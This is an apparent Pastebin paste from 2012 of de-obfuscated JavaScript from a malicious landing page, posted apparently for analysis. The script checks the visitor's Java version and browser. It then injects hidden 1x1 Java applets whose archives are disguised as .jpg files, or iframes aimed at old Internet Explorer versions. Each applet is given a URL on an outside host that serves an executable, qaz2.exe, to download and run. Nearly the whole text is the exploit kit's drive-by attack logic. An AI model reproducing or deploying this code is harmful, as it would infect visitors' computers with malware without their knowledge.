SHARE
TWEET

qq.wangmazz.com de-obfuscated index.html

eromang Oct 21st, 2012 208 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. xfxA2 = KfdhQD7;
  2.     fQFezgL3 = jROgpr3(20100418);
  3.     while (window.closed) {
  4.     }
  5.     document.write("<br>");
  6.     var gondady = document.createElement("body");
  7.     document.body.appendChild(gondady);
  8.     var gondadx = deployJava.getJREs() + "";
  9.     var arrx = gondadx.split(",");
  10.     gondadx = parseInt(arrx[0].replace(/\.|\_/g, ""));
  11.     for (i = 1; i < arrx.length; i++) {
  12.         tmp = parseInt(arrx[i].replace(/\.|\_/g, ""));
  13.         if (gondadx < tmp) {
  14.             gondadx = tmp;
  15.         }
  16.     }
  17.     if (gondadx <= 17006 && gondadx >= 17000 ||
  18.         gondadx <= 16032 && gondadx >= 16000 ||
  19.         gondadx <= 15033 && gondadx >= 15000) {
  20.         var gondad = document.createElement("applet");
  21.         gondad.width = "1";
  22.         gondad.height = "1";
  23.         if (gondadx <= 16027 && gondadx >= 16000 ||
  24.             gondadx >= 15000 && gondadx <= 15031) {
  25.             gondad.archive = "MpIDoGd6.jpg";
  26.             gondad.code = "GondadGondadExp.class";
  27.             gondad.setAttribute("dota", "http://xx.xiamaqq.com/010/qaz2.exe");
  28.             document.body.appendChild(gondad);
  29.         } else if (gondadx <= 17002 && gondadx >= 17000 ||
  30.             gondadx <= 16030 && gondadx >= 16000 ||
  31.             gondadx <= 15033 && gondadx >= 15000) {
  32.             gondad.archive = "IlKnJ2.jpg";
  33.             gondad.code = "GondadExx.Ohno.class";
  34.             gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  35.             gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  36.             gondad.setAttribute("si", "conglaiyebuqi");
  37.             gondad.setAttribute("bs", "748");
  38.             document.body.appendChild(gondad);
  39.         } else if (gondadx <= 17003 && gondadx >= 17000 ||
  40.             gondadx <= 16032 && gondadx >= 16000 ||
  41.             gondadx <= 15032 && gondadx >= 15000) {
  42.             gondad.archive = "hRqMABC5.jpg";
  43.             gondad.code = "gond1723.Gondattack.class";
  44.             gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  45.             gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  46.             gondad.setAttribute("si", "conglaiyebuqi");
  47.             gondad.setAttribute("bs", "748");
  48.             document.body.appendChild(gondad);
  49.         } else if (gondadx <= 17006 && gondadx >= 17000) {
  50.             var BiDBDJ0 = window.navigator.userAgent.toLowerCase();
  51.             if (BiDBDJ0.indexOf("msie 6") > -1) {
  52.                 document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://xx.xiamaqq.com/010/qaz2.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'AgaUpx0.jpg'></OBJECT>");
  53.             } else {
  54.                 gondad.archive = "AgaUpx0.jpg";
  55.                 gondad.code = "cve2012xxxx.Gondvv.class";
  56.                 gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  57.                 gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  58.                 gondad.setAttribute("si", "conglaiyebuqi");
  59.                 gondad.setAttribute("bs", "748");
  60.                 document.body.appendChild(gondad);
  61.             }
  62.         }
  63.     } else {
  64.         var BiDBDJ0 = window.navigator.userAgent.toLowerCase();
  65.         if (BiDBDJ0.indexOf("msie 6") > -1 ||
  66.             BiDBDJ0.indexOf("msie 7") > -1) {
  67.             document.writeln("<iframe src=MzQVVCV1.html></iframe>");
  68.         } else if (BiDBDJ0.indexOf("msie 8") > -1 &&
  69.             navigator.userAgent.indexOf("Windows NT 5.1") > -1 &&
  70.             navigator.browserLanguage.indexOf("ko") > -1) {
  71.             document.writeln("<iframe src=MpIDoGd6.html></iframe>");
  72.         }
  73.     }
  74.     delete BKKHW5;
  75.     delete KAEbwEp4;
  76.     delete HfVsMGm0;
  77.     delete SwRe6;
  78.     delete wyCk4;
  79.     delete HtDetKQ0;
  80.     delete JLCYl0;
  81.     delete WopPt5;
  82.     delete VMNLuY0;
  83.     delete VBnGOD0;
  84.     delete viNrp4;
  85.     delete AepzuTM4;
  86.     delete sLnUUk0;
  87.     delete KfdhQD7;
  88.     delete jbGUjNU4;
  89.     delete VxoxVUT7;
  90.     delete igsv2;
  91.     delete cyKn6;
  92.     delete IaQcSuH2;
  93.     delete jROgpr3;
  94.     delete fQFezgL3;
  95.     delete HxfuSm4;
  96.     delete GHNuliA6;
  97.     delete xfxA2;
  98.     delete bqCJvaD4;
  99.     delete AvxE8;
  100.     delete SuGW4;
  101.     delete RESK5;
  102.     delete oNJDGT6;
  103.     delete UGTG1;
  104.     delete ncWwT6;
  105.     delete oXpBQk7;
  106.     delete KMkVqO1;
  107.     delete qKKvff6;
  108.     delete PyeEtie1;
  109.     delete YMBOqa2;
  110.     delete tKVHRrc1;
  111.     delete vGOGxC5;
  112.     delete kDJFn2;
  113.     delete tUtYfW1;
  114.     try {
  115.         CollectGarbage();
  116.     } catch (e) {
  117.     }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top